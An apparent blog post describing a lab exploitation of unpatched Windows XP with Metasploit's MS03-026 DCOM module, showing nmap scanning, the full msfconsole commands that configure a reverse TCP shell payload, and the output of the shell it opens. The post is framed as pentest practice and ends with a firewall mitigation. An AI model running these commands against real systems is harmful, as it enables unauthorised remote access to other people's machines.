Alexander Mylnikov

31Jan/140

Metasploit: Gaining remote access to Windows XP

Нет, ну я многое видел, но чтобы такие косяки безопасности были открыты долгий срок - не не не. не надо так...

The target system is an old Windows XP system that has no service pack.

The exploit used is dcom ms03_026.

Exploit is like a backdoor found within a program bug usually this bug is a buffer overflow bug which caused the register to be overwritten, the overwritten register is loaded with the payload you select.

The payload I will use here is reverse tcp binding also known as reverse bind shell.

Bind shell – Is an incoming connection (the perception of the victim machine) from malicious remote location and creates a shell.

Reverse bind shell – Is the opposite, the victim machine establishes a legitimate connection to the malicious remote location and creates a shell of the victim machine. Reverse bind shell is very effective to evade default firewall settings, this is because the default firewall setting is usually allow everything from the trusted zone to the untrusted zone and block unsolicited traffic from untrusted zone to the trusted zone.

This is a lab setup for VA and pentest learning and practising, in actual scenario it is not as direct as this one.

Understand the target

root@bt:~# nmap -sS -Pn -vvv -O 192.168.20.18

PORT STATE SERVICE
113/tcp open ident
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1026/tcp open LSA-or-nterm
5000/tcp open upnp

OS details: Microsoft Windows 2000 SP0 – SP4 or Windows XP SP0 – SP1

dcom rpc exploit

msf > search dcom

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great Microsoft RPC DCOM Interface Overflow
exploit/windows/driver/broadcom_wifi_ssid 2006-11-11 low Broadcom Wireless Driver Probe Response SSID Overflow
exploit/windows/smb/ms04_031_netdde 2004-10-12 good Microsoft NetDDE Service Overflow

Use the exploit with ranking great.

Use the exploit

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) >

Understand the options for this exploit

msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 135 yes The target port
Exploit target:

Id Name
– —-
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) >

RHOST and RPORT are compulsory. The default RPORT is 135 which is the RPC port.

Set the target address

msf exploit(ms03_026_dcom) > set RHOST 192.168.20.18
RHOST => 192.168.20.18

set payload

Exploit is useless without payload, a payload is the thing you want to do to a target victim machine.

msf exploit(ms03_026_dcom) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp

There are several payloads available, for this lab reverse tcp is used.

Show options of the reverse tcp payload

msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.20.18 yes The target address
RPORT 135 yes The target port
Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:

Id Name
– —-
0 Windows NT SP3-6a/2000/XP/2003 Universal

All options are compulsory, I need to set the LHOST, LHOST is my machine which the victim machine will connect to.

msf payload(reverse_tcp) > set LHOST 192.168.20.12
LHOST => 192.168.20.12

I can set the EXITFUNC as well, the default is process. I can change to thread

msf payload(reverse_tcp) > set EXITFUNC thread
EXITFUNC => thread

I can also set my own LPORT for victim machine to connect, default LHOST is 4444.

msf exploit(ms03_026_dcom) > set LPORT 31337
LPORT => 31337

Exploit and payload configuration at a glance

msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.20.18 yes The target address
RPORT 135 yes The target port
Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.20.12 yes The listen address
LPORT 31337 yes The listen port
Exploit target:

Id Name
– —-
0 Windows NT SP3-6a/2000/XP/2003 Universal

Exploit starts

msf exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.20.12:31337
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal…
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.20.18[135] …
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.20.18[135] …
[*] Sending exploit …
[*] Sending stage (240 bytes) to 192.168.20.18
[*] Command shell session 1 opened (192.168.20.12:31337 -> 192.168.20.18:3040) at 2012-03-06 01:06:44 +0800

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

A shell is gained.

Victim machine user can see a strange connection from netstat.

C:\Documents and Settings\xxx>netstat

Active Connections

Proto Local Address Foreign Address State
TCP xxx:1919 192.168.20.12:4444 CLOSE_WAIT
TCP xxx:3040 192.168.20.12:31337 ESTABLISHED

I gained a shell there are countless of things I can do, it is very useful to learn the powershell and command prompt net or netsh command.

Finally note

Metasploit framework is actually used for building and testing exploits where security researchers do not need to reinvent the wheel to test their discovered exploits, however it is also a great tool for pentesting since it has huge and frequently updated exploit database.

A simple Windows firewall is sufficient to block this kind of attack, as firewall default behaviour is all unsolicited traffic from untrusted to trusted is blocked.

Comments (0) Trackbacks (0)

No comments yet.


Leave a comment

No trackbacks yet.